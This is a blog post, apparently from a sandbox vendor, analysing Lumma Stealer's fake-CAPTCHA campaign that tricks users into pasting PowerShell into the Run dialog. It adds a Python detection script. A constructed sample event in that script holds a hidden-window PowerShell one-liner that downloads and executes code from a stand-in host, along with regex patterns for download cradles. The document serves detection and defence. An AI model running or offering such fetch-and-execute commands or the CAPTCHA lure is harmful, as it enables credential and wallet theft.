A Recent Fake CAPTCHA Attack

Lumma Stealer, also known as LummaC2, is a widely known malware that first surfaced in 2022. Since then, it has steadily evolved, improving its techniques for stealing sensitive information.

Lumma Stealer targets a wide range of credentials, including browser-stored passwords, cryptocurrency wallets, and other valuable information. 

One of its most recent tactics involves using fake CAPTCHA pages as a disguise to trick users into executing the malware, making it a persistent and dangerous threat in the cybersecurity landscape.

What Lumma Stealer Targets

The targets of Lumma Stealer attacks vary; however, some of the main targets of this malware include:

  • Cryptocurrency wallets: Steals private keys and wallet credentials, making it a significant threat to crypto users.
  • Browser data: Collects browser-stored passwords, cookies, and browsing history, giving attackers easy access to accounts and personal information.
  • Credit card information: Extracts stored credit card details from browser extensions and form autofill data.
  • Two-Factor Authentication (2FA): Attempts to bypass 2FA by capturing authentication tokens and backup codes, allowing attackers to gain unauthorized access to accounts.

Technical Capabilities and Functionalities of Lumma Stealer

Lumma Stealer provides cybercriminals with several advanced functionalities, making it an effective tool for information theft and further exploitation. Key features include:

  • Data exfiltration: It extracts sensitive data from browsers, cryptocurrency wallets, and applications, focusing on credentials, financial info, and personal data.
  • Automatic updates: Lumma Stealer receives regular updates from its Command-and-Control (C2) servers to enhance evasion techniques and introduce new capabilities.
  • Data logging: The stealer compiles logs from infected systems, including browser data and clipboard content, for further exploitation.
  • Loader capability: It acts as a loader, enabling it to drop additional malware such as ransomware or trojans and so expanding the attack beyond credential theft.

Fake CAPTCHA Pages Exploited by Lumma Stealer in Recent Attacks

Lumma Stealer employs multiple distribution methods, including phishing emails, malicious downloads, and exploit kits. 

However, one of its more recent and deceptive tactics involves the use of fake CAPTCHA pages designed to trick users into executing malicious scripts. 

This method has proven highly effective for attackers, as it exploits the trust users place in CAPTCHA challenges, which are typically seen as legitimate security checks to verify human identity.

In a campaign recently observed through ANY.RUN’s malware sandbox, victims were prompted to complete a CAPTCHA to “fix” non-existent display errors or prove they were not bots.

However, a malicious script was disguised as a solution. The victim was instructed to copy and execute a PowerShell script via the WIN+R (Run) function. This led directly to the system being compromised by Lumma Stealer.

Check out a sandbox session showing this attack in detail. 

Fake CAPTCHA inside ANY.RUN’s sandbox

The sandbox displays the fake messages that attackers use to convince potential victims that they need to run a specific script on their computer to solve the supposed problem.

Fake messages used in Lumma attacks

The Lumma infection begins after the user copies the malicious script, pastes it into the Run window and executes it.

Start of the infection chain 

Once the malware is live, you can track how Lumma Stealer establishes communication with its Command-and-Control (C2) server, focusing on extracting sensitive data like browser-stored passwords, cryptocurrency keys, and even 2FA tokens.

ANY.RUN’s sandbox captures these interactions, showing the malware’s behavior in an isolated environment.

Command and Control activity detected by ANY.RUN

In this specific case of Lumma Stealer distribution via fake CAPTCHA pages, several MITRE ATT&CK techniques were observed:

MITRE ATT&CK TTPs used in Lumma Attack
  • Command and Scripting Interpreter: PowerShell – The attack relies heavily on PowerShell scripts executed by the user. After being tricked into running the malicious script through the WIN+R command, PowerShell is used to initiate the malware, which is a common technique for system exploitation.
  • User Execution: Malicious File – This technique is exploited when the user is convinced to execute the malicious file (the PowerShell script) under the belief that it will solve the CAPTCHA-related problem. 
  • Masquerading: Rename System Utilities – The malware script renames system utilities to appear legitimate or disguise its activity. 
  • Hide Artifacts: Hidden Window – Once executed, the malware may use a hidden window or background processes to avoid alerting the user to any suspicious activity. This technique helps ensure the malware can continue running undetected while carrying out its data exfiltration.
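The two observable traits described above (PowerShell launched from the Run dialog, i.e. with explorer.exe as parent, and a hidden window) can be turned into a simple detection over process-creation telemetry and over the Run dialog's history. The example below is added here and is not ANY.RUN's code; the event records and RunMRU values are constructed, and the field names are assumed to mirror a Sysmon-style process-creation event.

```python
import re

# Heuristic indicators of the Win+R PowerShell pattern (defensive, case-insensitive).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download_cradle": re.compile(
        r"\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", re.I),
}

# Constructed sample events (assumed field names: parent, image, cmdline); not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (irm http://fake-captcha.invalid/fix)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\inventory.ps1"},  # benign scheduled task
]


def powershell_indicators(cmdline):
    """Return the names of all indicators present in a command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def is_powershell(image):
    return image.lower().endswith(("powershell.exe", "pwsh.exe"))


def flag_run_dialog_powershell(events):
    """Flag PowerShell spawned by explorer.exe (the parent of a Run-dialog launch)
    whose command line carries at least one indicator. Returns (cmdline, indicators)."""
    hits = []
    for ev in events:
        if not is_powershell(ev["image"]) or not ev["parent"].lower().endswith("\\explorer.exe"):
            continue
        found = powershell_indicators(ev["cmdline"])
        if found:
            hits.append((ev["cmdline"], found))
    return hits


def suspicious_runmru(values):
    """Scan exported HKCU\\...\\Explorer\\RunMRU values; Windows stores each as '<command>\\1'."""
    cleaned = [v[:-2] if v.endswith("\\1") else v for v in values]
    return [v for v in cleaned if powershell_indicators(v)]
```

The RunMRU check is useful in forensics after the fact, since the pasted command survives in the user's registry hive even when the PowerShell process has long exited.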

Analyze Malware Securely with ANY.RUN’s Sandbox

To fully understand how malware operates, you can use ANY.RUN’s interactive malware sandbox to observe the entire infection chain in real time.

From initial infection to data exfiltration, the sandbox provides a comprehensive view of how malicious software operates. Track each step of the attack chain in a controlled environment, making it easier to detect and understand malware tactics without risking live systems.
